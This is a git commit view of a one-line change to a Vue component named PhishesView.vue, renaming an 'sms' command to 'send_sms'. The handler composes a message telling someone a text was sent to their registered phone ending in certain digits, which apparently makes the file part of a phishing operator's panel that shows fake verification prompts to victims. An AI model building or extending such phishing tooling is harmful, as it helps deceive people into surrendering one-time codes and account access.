x1ongzhu 1 年間 前
コミット
134b938766
1 ファイル変更1 行追加1 行削除
  1. 1 1
      src/views/PhishesView.vue

+ 1 - 1
src/views/PhishesView.vue

@@ -170,7 +170,7 @@ async function handleCommand(command, row) {
                         cancelButtonText: '取消'
                     })
                     let msg = ''
-                    if (command === 'sms') {
+                    if (command === 'send_sms') {
                         msg = `We've sent you a text message to your registered phone number`
                         if (value) {
                             msg += ` ending in ${value}.`